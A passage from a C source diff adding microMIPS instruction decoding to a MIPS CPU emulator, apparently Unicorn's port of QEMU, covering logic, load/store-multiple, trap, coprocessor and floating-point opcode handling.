8, 15, 16, + 31, 32, 63, 64, 255, 32768, 65535 }; + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rs = mmreg(uMIPS_RS(ctx->opcode)); + int encoded = ZIMM(ctx->opcode, 0, 4); + + gen_logic_imm(ctx, OPC_ANDI, rd, rs, decoded_imm[encoded]); +} + +static void gen_ldst_multiple (DisasContext *ctx, uint32_t opc, int reglist, + int base, int16_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "ldst_multiple"; + TCGv t0, t1; + TCGv_i32 t2; + + if (ctx->hflags & MIPS_HFLAG_BMASK) { + generate_exception(ctx, EXCP_RI); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + + gen_base_offset_addr(ctx, t0, base, offset); + + t1 = tcg_const_tl(tcg_ctx, reglist); + t2 = tcg_const_i32(tcg_ctx, ctx->mem_idx); + + save_cpu_state(ctx, 1); + switch (opc) { + case LWM32: + gen_helper_lwm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); + opn = "lwm"; + break; + case SWM32: + gen_helper_swm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); + opn = "swm"; + break; +#ifdef TARGET_MIPS64 + case LDM: + gen_helper_ldm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); + opn = "ldm"; + break; + case SDM: + gen_helper_sdm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); + opn = "sdm"; + break; +#endif + } + (void)opn; + MIPS_DEBUG("%s, %x, %d(%s)", opn, reglist, offset, regnames[base]); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free_i32(tcg_ctx, t2); +} + + +static void gen_pool16c_insn(DisasContext *ctx) +{ + int rd = mmreg((ctx->opcode >> 3) & 0x7); + int rs = mmreg(ctx->opcode & 0x7); + + switch (((ctx->opcode) >> 4) & 0x3f) { + case NOT16 + 0: + case NOT16 + 1: + case NOT16 + 2: + case NOT16 + 3: + gen_logic(ctx, OPC_NOR, rd, rs, 0); + break; + case XOR16 + 0: + case XOR16 + 1: + case XOR16 + 2: + case XOR16 + 3: + gen_logic(ctx, OPC_XOR, rd, rd, rs); + break; + case AND16 + 0: + case AND16 + 1: + case AND16 + 2: + case AND16 + 3: + gen_logic(ctx, OPC_AND, rd, rd, rs); + break; + case OR16 + 0: + case OR16 + 1: + case OR16 + 2: + case OR16 + 3: + gen_logic(ctx, OPC_OR, rd, rd, rs); + break; + case LWM16 + 0: + case LWM16 + 1: + case LWM16 + 2: + case LWM16 + 3: + { + static const int lwm_convert[] = { 0x11, 0x12, 0x13, 0x14 }; + int offset = ZIMM(ctx->opcode, 0, 4); + + gen_ldst_multiple(ctx, LWM32, lwm_convert[(ctx->opcode >> 4) & 0x3], + 29, offset << 2); + } + break; + case SWM16 + 0: + case SWM16 + 1: + case SWM16 + 2: + case SWM16 + 3: + { + static const int swm_convert[] = { 0x11, 0x12, 0x13, 0x14 }; + int offset = ZIMM(ctx->opcode, 0, 4); + + gen_ldst_multiple(ctx, SWM32, swm_convert[(ctx->opcode >> 4) & 0x3], + 29, offset << 2); + } + break; + case JR16 + 0: + case JR16 + 1: + { + int reg = ctx->opcode & 0x1f; + + gen_compute_branch(ctx, OPC_JR, 2, reg, 0, 0, 4); + } + break; + case JRC16 + 0: + case JRC16 + 1: + { + int reg = ctx->opcode & 0x1f; + gen_compute_branch(ctx, OPC_JR, 2, reg, 0, 0, 0); + /* Let normal delay slot handling in our caller take us + to the branch target. */ + } + break; + case JALR16 + 0: + case JALR16 + 1: + gen_compute_branch(ctx, OPC_JALR, 2, ctx->opcode & 0x1f, 31, 0, 4); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case JALR16S + 0: + case JALR16S + 1: + gen_compute_branch(ctx, OPC_JALR, 2, ctx->opcode & 0x1f, 31, 0, 2); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case MFHI16 + 0: + case MFHI16 + 1: + gen_HILO(ctx, OPC_MFHI, 0, uMIPS_RS5(ctx->opcode)); + break; + case MFLO16 + 0: + case MFLO16 + 1: + gen_HILO(ctx, OPC_MFLO, 0, uMIPS_RS5(ctx->opcode)); + break; + case BREAK16: + generate_exception(ctx, EXCP_BREAK); + break; + case SDBBP16: + /* XXX: not clear which exception should be raised + * when in debug mode... + */ + check_insn(ctx, ISA_MIPS32); + if (!(ctx->hflags & MIPS_HFLAG_DM)) { + generate_exception(ctx, EXCP_DBp); + } else { + generate_exception(ctx, EXCP_DBp); + } + break; + case JRADDIUSP + 0: + case JRADDIUSP + 1: + { + int imm = ZIMM(ctx->opcode, 0, 5); + gen_compute_branch(ctx, OPC_JR, 2, 31, 0, 0, 0); + gen_arith_imm(ctx, OPC_ADDIU, 29, 29, imm << 2); + /* Let normal delay slot handling in our caller take us + to the branch target. */ + } + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void gen_ldxs (DisasContext *ctx, int base, int index, int rd) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, base); + + if (index != 0) { + gen_load_gpr(ctx, t1, index); + tcg_gen_shli_tl(tcg_ctx, t1, t1, 2); + gen_op_addr_add(ctx, t0, t1, t0); + } + + tcg_gen_qemu_ld_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TESL); + gen_store_gpr(tcg_ctx, t1, rd); + + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_ldst_pair (DisasContext *ctx, uint32_t opc, int rd, + int base, int16_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "ldst_pair"; + TCGv t0, t1; + + if (ctx->hflags & MIPS_HFLAG_BMASK || rd == 31) { + generate_exception(ctx, EXCP_RI); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + + gen_base_offset_addr(ctx, t0, base, offset); + + switch (opc) { + case LWP: + if (rd == base) { + generate_exception(ctx, EXCP_RI); + return; + } + tcg_gen_qemu_ld_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TESL); + gen_store_gpr(tcg_ctx, t1, rd); + tcg_gen_movi_tl(tcg_ctx, t1, 4); + gen_op_addr_add(ctx, t0, t0, t1); + tcg_gen_qemu_ld_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TESL); + gen_store_gpr(tcg_ctx, t1, rd+1); + opn = "lwp"; + break; + case SWP: + gen_load_gpr(ctx, t1, rd); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); + tcg_gen_movi_tl(tcg_ctx, t1, 4); + gen_op_addr_add(ctx, t0, t0, t1); + gen_load_gpr(ctx, t1, rd+1); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); + opn = "swp"; + break; +#ifdef TARGET_MIPS64 + case LDP: + if (rd == base) { + generate_exception(ctx, EXCP_RI); + return; + } + tcg_gen_qemu_ld_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEQ); + gen_store_gpr(tcg_ctx, t1, rd); + tcg_gen_movi_tl(tcg_ctx, t1, 8); + gen_op_addr_add(ctx, t0, t0, t1); + tcg_gen_qemu_ld_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEQ); + gen_store_gpr(tcg_ctx, t1, rd+1); + opn = "ldp"; + break; + case SDP: + gen_load_gpr(ctx, t1, rd); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEQ); + tcg_gen_movi_tl(tcg_ctx, t1, 8); + gen_op_addr_add(ctx, t0, t0, t1); + gen_load_gpr(ctx, t1, rd+1); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEQ); + opn = "sdp"; + break; +#endif + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s, %s, %d(%s)", opn, regnames[rd], offset, regnames[base]); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_pool32axf (CPUMIPSState *env, DisasContext *ctx, int rt, int rs) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int extension = (ctx->opcode >> 6) & 0x3f; + int minor = (ctx->opcode >> 12) & 0xf; + uint32_t mips32_op; + + switch (extension) { + case TEQ: + mips32_op = OPC_TEQ; + goto do_trap; + case TGE: + mips32_op = OPC_TGE; + goto do_trap; + case TGEU: + mips32_op = OPC_TGEU; + goto do_trap; + case TLT: + mips32_op = OPC_TLT; + goto do_trap; + case TLTU: + mips32_op = OPC_TLTU; + goto do_trap; + case TNE: + mips32_op = OPC_TNE; + do_trap: + gen_trap(ctx, mips32_op, rs, rt, -1); + break; +#ifndef CONFIG_USER_ONLY + case MFC0: + case MFC0 + 32: + check_cp0_enabled(ctx); + if (rt == 0) { + /* Treat as NOP. */ + break; + } + gen_mfc0(ctx, *cpu_gpr[rt], rs, (ctx->opcode >> 11) & 0x7); + break; + case MTC0: + case MTC0 + 32: + check_cp0_enabled(ctx); + { + TCGv t0 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rt); + gen_mtc0(ctx, t0, rs, (ctx->opcode >> 11) & 0x7); + tcg_temp_free(tcg_ctx, t0); + } + break; +#endif + case 0x2a: + switch (minor & 3) { + case MADD_ACC: + gen_muldiv(ctx, OPC_MADD, (ctx->opcode >> 14) & 3, rs, rt); + break; + case MADDU_ACC: + gen_muldiv(ctx, OPC_MADDU, (ctx->opcode >> 14) & 3, rs, rt); + break; + case MSUB_ACC: + gen_muldiv(ctx, OPC_MSUB, (ctx->opcode >> 14) & 3, rs, rt); + break; + case MSUBU_ACC: + gen_muldiv(ctx, OPC_MSUBU, (ctx->opcode >> 14) & 3, rs, rt); + break; + default: + goto pool32axf_invalid; + } + break; + case 0x32: + switch (minor & 3) { + case MULT_ACC: + gen_muldiv(ctx, OPC_MULT, (ctx->opcode >> 14) & 3, rs, rt); + break; + case MULTU_ACC: + gen_muldiv(ctx, OPC_MULTU, (ctx->opcode >> 14) & 3, rs, rt); + break; + default: + goto pool32axf_invalid; + } + break; + case 0x2c: + switch (minor) { + case SEB: + gen_bshfl(ctx, OPC_SEB, rs, rt); + break; + case SEH: + gen_bshfl(ctx, OPC_SEH, rs, rt); + break; + case CLO: + mips32_op = OPC_CLO; + goto do_cl; + case CLZ: + mips32_op = OPC_CLZ; + do_cl: + check_insn(ctx, ISA_MIPS32); + gen_cl(ctx, mips32_op, rt, rs); + break; + case RDHWR: + gen_rdhwr(ctx, rt, rs); + break; + case WSBH: + gen_bshfl(ctx, OPC_WSBH, rs, rt); + break; + case MULT: + mips32_op = OPC_MULT; + goto do_mul; + case MULTU: + mips32_op = OPC_MULTU; + goto do_mul; + case DIV: + mips32_op = OPC_DIV; + goto do_div; + case DIVU: + mips32_op = OPC_DIVU; + goto do_div; + do_div: + check_insn(ctx, ISA_MIPS32); + gen_muldiv(ctx, mips32_op, 0, rs, rt); + break; + case MADD: + mips32_op = OPC_MADD; + goto do_mul; + case MADDU: + mips32_op = OPC_MADDU; + goto do_mul; + case MSUB: + mips32_op = OPC_MSUB; + goto do_mul; + case MSUBU: + mips32_op = OPC_MSUBU; + do_mul: + check_insn(ctx, ISA_MIPS32); + gen_muldiv(ctx, mips32_op, 0, rs, rt); + break; + default: + goto pool32axf_invalid; + } + break; + case 0x34: + switch (minor) { + case MFC2: + case MTC2: + case MFHC2: + case MTHC2: + case CFC2: + case CTC2: + generate_exception_err(ctx, EXCP_CpU, 2); + break; + default: + goto pool32axf_invalid; + } + break; + case 0x3c: + switch (minor) { + case JALR: + case JALR_HB: + gen_compute_branch(ctx, OPC_JALR, 4, rs, rt, 0, 4); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case JALRS: + case JALRS_HB: + gen_compute_branch(ctx, OPC_JALR, 4, rs, rt, 0, 2); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + default: + goto pool32axf_invalid; + } + break; + case 0x05: + switch (minor) { + case RDPGPR: + check_cp0_enabled(ctx); + check_insn(ctx, ISA_MIPS32R2); + gen_load_srsgpr(ctx, rt, rs); + break; + case WRPGPR: + check_cp0_enabled(ctx); + check_insn(ctx, ISA_MIPS32R2); + gen_store_srsgpr(ctx, rt, rs); + break; + default: + goto pool32axf_invalid; + } + break; +#ifndef CONFIG_USER_ONLY + case 0x0d: + switch (minor) { + case TLBP: + mips32_op = OPC_TLBP; + goto do_cp0; + case TLBR: + mips32_op = OPC_TLBR; + goto do_cp0; + case TLBWI: + mips32_op = OPC_TLBWI; + goto do_cp0; + case TLBWR: + mips32_op = OPC_TLBWR; + goto do_cp0; + case WAIT: + mips32_op = OPC_WAIT; + goto do_cp0; + case DERET: + mips32_op = OPC_DERET; + goto do_cp0; + case ERET: + mips32_op = OPC_ERET; + do_cp0: + gen_cp0(env, ctx, mips32_op, rt, rs); + break; + default: + goto pool32axf_invalid; + } + break; + case 0x1d: + switch (minor) { + case DI: + check_cp0_enabled(ctx); + { + TCGv t0 = tcg_temp_new(tcg_ctx); + + save_cpu_state(ctx, 1); + gen_helper_di(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rs); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + tcg_temp_free(tcg_ctx, t0); + } + break; + case EI: + check_cp0_enabled(ctx); + { + TCGv t0 = tcg_temp_new(tcg_ctx); + + save_cpu_state(ctx, 1); + gen_helper_ei(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rs); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + tcg_temp_free(tcg_ctx, t0); + } + break; + default: + goto pool32axf_invalid; + } + break; +#endif + case 0x2d: + switch (minor) { + case SYNC: + /* NOP */ + break; + case SYSCALL: + generate_exception(ctx, EXCP_SYSCALL); + ctx->bstate = BS_STOP; + break; + case SDBBP: + check_insn(ctx, ISA_MIPS32); + if (!(ctx->hflags & MIPS_HFLAG_DM)) { + generate_exception(ctx, EXCP_DBp); + } else { + generate_exception(ctx, EXCP_DBp); + } + break; + default: + goto pool32axf_invalid; + } + break; + case 0x01: + switch (minor & 3) { + case MFHI_ACC: + gen_HILO(ctx, OPC_MFHI, minor >> 2, rs); + break; + case MFLO_ACC: + gen_HILO(ctx, OPC_MFLO, minor >> 2, rs); + break; + case MTHI_ACC: + gen_HILO(ctx, OPC_MTHI, minor >> 2, rs); + break; + case MTLO_ACC: + gen_HILO(ctx, OPC_MTLO, minor >> 2, rs); + break; + default: + goto pool32axf_invalid; + } + break; + case 0x35: + switch (minor) { + case MFHI32: + gen_HILO(ctx, OPC_MFHI, 0, rs); + break; + case MFLO32: + gen_HILO(ctx, OPC_MFLO, 0, rs); + break; + case MTHI32: + gen_HILO(ctx, OPC_MTHI, 0, rs); + break; + case MTLO32: + gen_HILO(ctx, OPC_MTLO, 0, rs); + break; + default: + goto pool32axf_invalid; + } + break; + default: + pool32axf_invalid: + MIPS_INVAL("pool32axf"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +/* Values for microMIPS fmt field. Variable-width, depending on which + formats the instruction supports. */ + +enum { + FMT_SD_S = 0, + FMT_SD_D = 1, + + FMT_SDPS_S = 0, + FMT_SDPS_D = 1, + FMT_SDPS_PS = 2, + + FMT_SWL_S = 0, + FMT_SWL_W = 1, + FMT_SWL_L = 2, + + FMT_DWL_D = 0, + FMT_DWL_W = 1, + FMT_DWL_L = 2 +}; + +static void gen_pool32fxf(DisasContext *ctx, int rt, int rs) +{ + int extension = (ctx->opcode >> 6) & 0x3ff; + uint32_t mips32_op; + +#define FLOAT_1BIT_FMT(opc, fmt) (fmt << 8) | opc +#define FLOAT_2BIT_FMT(opc, fmt) (fmt << 7) | opc +#define COND_FLOAT_MOV(opc, cond) (cond << 7) | opc + + switch (extension) { + case FLOAT_1BIT_FMT(CFC1, 0): + mips32_op = OPC_CFC1; + goto do_cp1; + case FLOAT_1BIT_FMT(CTC1, 0): + mips32_op = OPC_CTC1; + goto do_cp1; + case FLOAT_1BIT_FMT(MFC1, 0): + mips32_op = OPC_MFC1; + goto do_cp1; + case FLOAT_1BIT_FMT(MTC1, 0): + mips32_op = OPC_MTC1; + goto do_cp1; + case FLOAT_1BIT_FMT(MFHC1, 0): + mips32_op = OPC_MFHC1; + goto do_cp1; + case FLOAT_1BIT_FMT(MTHC1, 0): + mips32_op = OPC_MTHC1; + do_cp1: + gen_cp1(ctx, mips32_op, rt, rs); + break; + + /* Reciprocal square root */ + case FLOAT_1BIT_FMT(RSQRT_FMT, FMT_SD_S): + mips32_op = OPC_RSQRT_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(RSQRT_FMT, FMT_SD_D): + mips32_op = OPC_RSQRT_D; + goto do_unaryfp; + + /* Square root */ + case FLOAT_1BIT_FMT(SQRT_FMT, FMT_SD_S): + mips32_op = OPC_SQRT_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(SQRT_FMT, FMT_SD_D): + mips32_op = OPC_SQRT_D; + goto do_unaryfp; + + /* Reciprocal */ + case FLOAT_1BIT_FMT(RECIP_FMT, FMT_SD_S): + mips32_op = OPC_RECIP_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(RECIP_FMT, FMT_SD_D): + mips32_op = OPC_RECIP_D; + goto do_unaryfp; + + /* Floor */ + case FLOAT_1BIT_FMT(FLOOR_L, FMT_SD_S): + mips32_op = OPC_FLOOR_L_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(FLOOR_L, FMT_SD_D): + mips32_op = OPC_FLOOR_L_D; + goto do_unaryfp; + case FLOAT_1BIT_FMT(FLOOR_W, FMT_SD_S): + mips32_op = OPC_FLOOR_W_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(FLOOR_W, FMT_SD_D): + mips32_op = OPC_FLOOR_W_D; + goto do_unaryfp; + + /* Ceiling */ + case FLOAT_1BIT_FMT(CEIL_L, FMT_SD_S): + mips32_op = OPC_CEIL_L_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CEIL_L, FMT_SD_D): + mips32_op = OPC_CEIL_L_D; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CEIL_W, FMT_SD_S): + mips32_op = OPC_CEIL_W_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CEIL_W, FMT_SD_D): + mips32_op = OPC_CEIL_W_D; + goto do_unaryfp; + + /* Truncation */ + case FLOAT_1BIT_FMT(TRUNC_L, FMT_SD_S): + mips32_op = OPC_TRUNC_L_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(TRUNC_L, FMT_SD_D): + mips32_op = OPC_TRUNC_L_D; + goto do_unaryfp; + case FLOAT_1BIT_FMT(TRUNC_W, FMT_SD_S): + mips32_op = OPC_TRUNC_W_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(TRUNC_W, FMT_SD_D): + mips32_op = OPC_TRUNC_W_D; + goto do_unaryfp; + + /* Round */ + case FLOAT_1BIT_FMT(ROUND_L, FMT_SD_S): + mips32_op = OPC_ROUND_L_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(ROUND_L, FMT_SD_D): + mips32_op = OPC_ROUND_L_D; + goto do_unaryfp; + case FLOAT_1BIT_FMT(ROUND_W, FMT_SD_S): + mips32_op = OPC_ROUND_W_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(ROUND_W, FMT_SD_D): + mips32_op = OPC_ROUND_W_D; + goto do_unaryfp; + + /* Integer to floating-point conversion */ + case FLOAT_1BIT_FMT(CVT_L, FMT_SD_S): + mips32_op = OPC_CVT_L_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CVT_L, FMT_SD_D): + mips32_op = OPC_CVT_L_D; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CVT_W, FMT_SD_S): + mips32_op = OPC_CVT_W_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CVT_W, FMT_SD_D): + mips32_op = OPC_CVT_W_D; + goto do_unaryfp; + + /* Paired-foo conversions */ + case FLOAT_1BIT_FMT(CVT_S_PL, 0): + mips32_op = OPC_CVT_S_PL; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CVT_S_PU, 0): + mips32_op = OPC_CVT_S_PU; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CVT_PW_PS, 0): + mips32_op = OPC_CVT_PW_PS; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CVT_PS_PW, 0): + mips32_op = OPC_CVT_PS_PW; + goto do_unaryfp; + + /* Floating-point moves */ + case FLOAT_2BIT_FMT(MOV_FMT, FMT_SDPS_S): + mips32_op = OPC_MOV_S; + goto do_unaryfp; + case FLOAT_2BIT_FMT(MOV_FMT, FMT_SDPS_D): + mips32_op = OPC_MOV_D; + goto do_unaryfp; + case FLOAT_2BIT_FMT(MOV_FMT, FMT_SDPS_PS): + mips32_op = OPC_MOV_PS; + goto do_unaryfp; + + /* Absolute value */ + case FLOAT_2BIT_FMT(ABS_FMT, FMT_SDPS_S): + mips32_op = OPC_ABS_S; + goto do_unaryfp; + case FLOAT_2BIT_FMT(ABS_FMT, FMT_SDPS_D): + mips32_op = OPC_ABS_D; + goto do_unaryfp; + case FLOAT_2BIT_FMT(ABS_FMT, FMT_SDPS_PS): + mips32_op = OPC_ABS_PS; + goto do_unaryfp; + + /* Negation */ + case FLOAT_2BIT_FMT(NEG_FMT, FMT_SDPS_S): + mips32_op = OPC_NEG_S; + goto do_unaryfp; + case FLOAT_2BIT_FMT(NEG_FMT, FMT_SDPS_D): + mips32_op = OPC_NEG_D; + goto do_unaryfp; + case FLOAT_2BIT_FMT(NEG_FMT, FMT_SDPS_PS): + mips32_op = OPC_NEG_PS; + goto do_unaryfp; + + /* Reciprocal square root step */ + case FLOAT_2BIT_FMT(RSQRT1_FMT, FMT_SDPS_S): + mips32_op = OPC_RSQRT1_S; + goto do_unaryfp; + case FLOAT_2BIT_FMT(RSQRT1_FMT, FMT_SDPS_D): + mips32_op = OPC_RSQRT1_D; + goto do_unaryfp; + case FLOAT_2BIT_FMT(RSQRT1_FMT, FMT_SDPS_PS): + mips32_op = OPC_RSQRT1_PS; + goto do_unaryfp; + + /* Reciprocal step */ + case FLOAT_2BIT_FMT(RECIP1_FMT, FMT_SDPS_S): + mips32_op = OPC_RECIP1_S; + goto do_unaryfp; + case FLOAT_2BIT_FMT(RECIP1_FMT, FMT_SDPS_D): + mips32_op = OPC_RECIP1_S; + goto do_unaryfp; + case FLOAT_2BIT_FMT(RECIP1_FMT, FMT_SDPS_PS): + mips32_op = OPC_RECIP1_PS; + goto do_unaryfp; + + /* Conversions from double */ + case FLOAT_2BIT_FMT(CVT_D, FMT_SWL_S): + mips32_op = OPC_CVT_D_S; + goto do_unaryfp; + case FLOAT_2BIT_FMT(CVT_D, FMT_SWL_W): + mips32_op = OPC_CVT_D_W; + goto do_unaryfp; + case FLOAT_2BIT_FMT(CVT_D, FMT_SWL_L): + mips32_op = OPC_CVT_D_L; + goto do_unaryfp; + + /* Conversions from single */ + case FLOAT_2BIT_FMT(CVT_S, FMT_DWL_D): + mips32_op = OPC_CVT_S_D; + goto do_unaryfp; + case FLOAT_2BIT_FMT(CVT_S, FMT_DWL_W): + mips32_op = OPC_CVT_S_W; + goto do_unaryfp; + case FLOAT_2BIT_FMT(CVT_S, FMT_DWL_L): + mips32_op = OPC_CVT_S_L; + do_unaryfp: + gen_farith(ctx, mips32_op, -1, rs, rt, 0); + break; + + /* Conditional moves on floating-point codes */ + case COND_FLOAT_MOV(MOVT, 0): + case COND_FLOAT_MOV(MOVT, 1): + case COND_FLOAT_MOV(MOVT, 2): + case COND_FLOAT_MOV(MOVT, 3): + case COND_FLOAT_MOV(MOVT, 4): + case COND_FLOAT_MOV(MOVT, 5): + case COND_FLOAT_MOV(MOVT, 6): + case COND_FLOAT_MOV(MOVT, 7): + gen_movci(ctx, rt, rs, (ctx->opcode >> 13) & 0x7, 1); + break; + case COND_FLOAT_MOV(MOVF, 0): + case COND_FLOAT_MOV(MOVF, 1): + case COND_FLOAT_MOV(MOVF, 2): + case COND_FLOAT_MOV(MOVF, 3): + case COND_FLOAT_MOV(MOVF, 4): + case COND_FLOAT_MOV(MOVF, 5): + case COND_FLOAT_MOV(MOVF, 6): + case COND_FLOAT_MOV(MOVF, 7): + gen_movci(ctx, rt, rs, (ctx->opcode >> 13) & 0x7, 0); + break; + default: + MIPS_INVAL("pool32fxf"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void decode_micromips32_opc (CPUMIPSState *env, DisasContext *ctx, + uint16_t insn_hw1) +{ + int32_t offset; + uint16_t insn; + int rt, rs, rd, rr; + int16_t imm; + uint32_t op, minor, mips32_op; + uint32_t cond, fmt, cc; + + insn = cpu_lduw_code(env, ctx->pc + 2); + ctx->opcode = (ctx->opcode << 16) | insn; + + rt = (ctx->opcode >> 21) & 0x1f; + rs = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + rr = (ctx->opcode >> 6) & 0x1f; + imm = (int16_t) ctx->opcode; + + op = (ctx->opcode >> 26) & 0x3f; + switch (op) { + case POOL32A: + minor = ctx->opcode & 0x3f; + switch (minor) { + case 0x00: + minor = (ctx->opcode >> 6) & 0xf; + switch (minor) { + case SLL32: + mips32_op = OPC_SLL; + goto do_shifti; + case SRA: + mips32_op = OPC_SRA; + goto do_shifti; + case SRL32: + mips32_op = OPC_SRL; + goto do_shifti; + case ROTR: + mips32_op = OPC_ROTR; + do_shifti: + gen_shift_imm(ctx, mips32_op, rt, rs, rd); + break; + default: + goto pool32a_invalid; + } + break; + case 0x10: + minor = (ctx->opcode >> 6) & 0xf; + switch (minor) { + /* Arithmetic */ + case ADD: + mips32_op = OPC_ADD; + goto do_arith; + case ADDU32: + mips32_op = OPC_ADDU; + goto do_arith; + case SUB: + mips32_op = OPC_SUB; + goto do_arith; + case SUBU32: + mips32_op = OPC_SUBU; + goto do_arith; + case MUL: + mips32_op = OPC_MUL; + do_arith: + gen_arith(ctx, mips32_op, rd, rs, rt); + break; + /* Shifts */ + case SLLV: + mips32_op = OPC_SLLV; + goto do_shift; + case SRLV: + mips32_op = OPC_SRLV; + goto do_shift; + case SRAV: + mips32_op = OPC_SRAV; + goto do_shift; + case ROTRV: + mips32_op = OPC_ROTRV; + do_shift: + gen_shift(ctx, mips32_op, rd, rs, rt); + break; + /* Logical operations */ + case AND: + mips32_op = OPC_AND; + goto do_logic; + case OR32: + mips32_op = OPC_OR; + goto do_logic; + case NOR: + mips32_op = OPC_NOR; + goto do_logic; + case XOR32: + mips32_op = OPC_XOR; + do_logic: + gen_logic(ctx, mips32_op, rd, rs, rt); + break; + /* Set less than */ + case SLT: + mips32_op = OPC_SLT; + goto do_slt; + case SLTU: + mips32_op = OPC_SLTU; + do_slt: + gen_slt(ctx, mips32_op, rd, rs, rt); + break; + default: + goto pool32a_invalid; + } + break; + case 0x18: + minor = (ctx->opcode >> 6) & 0xf; + switch (minor) { + /* Conditional moves */ + case MOVN: + mips32_op = OPC_MOVN; + goto do_cmov; + case MOVZ: + mips32_op = OPC_MOVZ; + do_cmov: + gen_cond_move(ctx, mips32_op, rd, rs, rt); + break; + case LWXS: + gen_ldxs(ctx, rs, rt, rd); + break; + default: + goto pool32a_invalid; + } + break; + case INS: + gen_bitops(ctx, OPC_INS, rt, rs, rr, rd); + return; + case EXT: + gen_bitops(ctx, OPC_EXT, rt, rs, rr, rd); + return; + case POOL32AXF: + gen_pool32axf(env, ctx, rt, rs); + break; + case 0x07: + generate_exception(ctx, EXCP_BREAK); + break; + default: + pool32a_invalid: + MIPS_INVAL("pool32a"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case POOL32B: + minor = (ctx->opcode >> 12) & 0xf; + switch (minor) { + case CACHE: + check_cp0_enabled(ctx); + /* Treat as no-op. */ + break; + case LWC2: + case SWC2: + /* COP2: Not implemented. */ + generate_exception_err(ctx, EXCP_CpU, 2); + break; + case LWP: + case SWP: +#ifdef TARGET_MIPS64 + case LDP: + case SDP: +#endif + gen_ldst_pair(ctx, minor, rt, rs, SIMM(ctx->opcode, 0, 12)); + break; + case LWM32: + case SWM32: +#ifdef TARGET_MIPS64 + case LDM: + case SDM: +#endif + gen_ldst_multiple(ctx, minor, rt, rs, SIMM(ctx->opcode, 0, 12)); + break; + default: + MIPS_INVAL("pool32b"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case POOL32F: + if (ctx->CP0_Config1 & (1 << CP0C1_FP)) { + minor = ctx->opcode & 0x3f; + check_cp1_enabled(ctx); + switch (minor) { + case ALNV_PS: + mips32_op = OPC_ALNV_PS; + goto do_madd; + case MADD_S: + mips32_op = OPC_MADD_S; + goto do_madd; + case MADD_D: + mips32_op = OPC_MADD_D; + goto do_madd; + case MADD_PS: + mips32_op = OPC_MADD_PS; + goto do_madd; + case MSUB_S: + mips32_op = OPC_MSUB_S; + goto do_madd; + case MSUB_D: + mips32_op = OPC_MSUB_D; + goto do_madd; + case MSUB_PS: + mips32_op = OPC_MSUB_PS; + goto do_madd; + case NMADD_S: + mips32_op = OPC_NMADD_S; + goto do_madd; + case NMADD_D: + mips32_op = OPC_NMADD_D; + goto do_madd; + case NMADD_PS: + mips32_op = OPC_NMADD_PS; + goto do_madd; + case NMSUB_S: + mips32_op = OPC_NMSUB_S; + goto do_madd; + case NMSUB_D: + mips32_op = OPC_NMSUB_D; + goto do_madd; + 